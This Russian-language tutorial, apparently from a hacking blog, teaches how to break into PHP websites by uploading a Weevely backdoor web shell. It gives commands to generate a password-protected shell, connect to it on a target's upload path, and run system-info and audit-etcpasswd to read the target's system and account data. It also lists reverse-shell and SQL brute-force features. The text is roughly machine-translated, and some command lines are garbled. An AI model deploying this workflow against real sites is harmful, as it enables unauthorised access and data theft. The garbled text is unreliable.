Как взламывать сайты, загружая оболочку PHP Backdoor

Этот пост о взломе веб-сайтов с помощью бэкдора. Сегодня мы узнаем, как взломать веб-сайт с помощью оболочки PHP-бэкдора. Weevely - это инструмент, который помогает внедрить бэкдор в любой веб-сайт PHP.

Мы загружаем на веб-сайт файл, такой как: документ, PDF-файл и изображение, и вы можете загрузить собственную PHP-страницу на веб-сайт. Этот инструмент обнаружит слабые места в вашей цели, если сайт уязвим, вы можете загрузить на веб-сайт любую вещь. Если мы загружаем тип вредоносного ПО Дело в том, что это вред целевому сайту. как взломать сайт с помощью бэкдора PHP.

Что такое бэкдор?

В Ethical hacking Hacking и Cyber ​​Security World, бэкдор - это метод, с помощью которого злоумышленник получает доступ к любому компьютеру, веб-сайту и т.д. без их разрешения.

Что такое Weevely?

Wevely - это веб-программное обеспечение, которое предоставляет веб-оболочку PHP, которая загружается на веб-сайт и запускается бэкдор. Помните, что это работает на веб-сайте написанным на PHP, их миллион веб-сайтов в мире имеет серверную часть PHP.

Функции:

• Доступ к оболочки цели
• 
  
• SQL console pivoting on the target
• 
  
• Прокси-сервер HTTP / HTTPS для просмотра цели
• 
  
• Загружать и скачивать файлы
• 
  
• Создавать обратные и прямые TCP-оболочки
• 
  
• Аудит безопасности удаленного целевого объекта
• 
  
• Сканирование портов цели
• 
  
• Сканирование удалённой файловой системы
• 
  
• Brutforce учётных записей SQL
• 
  

Инструмент Weevely уже установлен в Kali Linux Os. Если вы используете другую платформу, используйте следующую команду для установки

git clone https://github.com/eppina/weevely3

Прежде всего, откройте терминал для машин Kali и введите «weevely».

Wevely покажите нам информацию для типа помощи «weevely –help»

Эта команда показывает нам, как работать в трёх режимах.

generate

terminal

session

Как создать бэкдор

Теперь мы создаем бэкдор для нашего целевого веб-сайта, введите следующую команду

weevely generate [ backdoor password ] [ path and name of backdoor]

Сначала мы создаем бэкдор для целевого сайта.

weevely generate 12345 /root/Desktop/backdoor

Наконец, мы успешно сгенерировали бэкдор. Из-за проблем с безопасностью (своей) я не могу показать вам на практике, как внедрить бэкдор, я расскажу вам всю рабочую схему, которая будет использоваться для создания сеанса, загрузите бэкдор PHP на ваш целевой веб-сайт.

Когда мы успешно загрузили бэкдор, теперь пришло время выполнить активацию бэкдора, введите следующую команду

weevely password of backdoor ]

например:

weevely http://192.168.1.109/dvwa/hackable/uploads/hackers-arise-backdoor.php 12345

Он успешно выполнен, в результате наша оболочка PHP откроется автоматически.

Введите команду «help» и посмотрите, что мы можем сделать.

По очереди введите следующую команду:

system-info

audit-etcpasswd

Наконец, мы загружаем файл PHP на веб-сайт и запускаем этот файл с помощью инструмента Wevely.

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.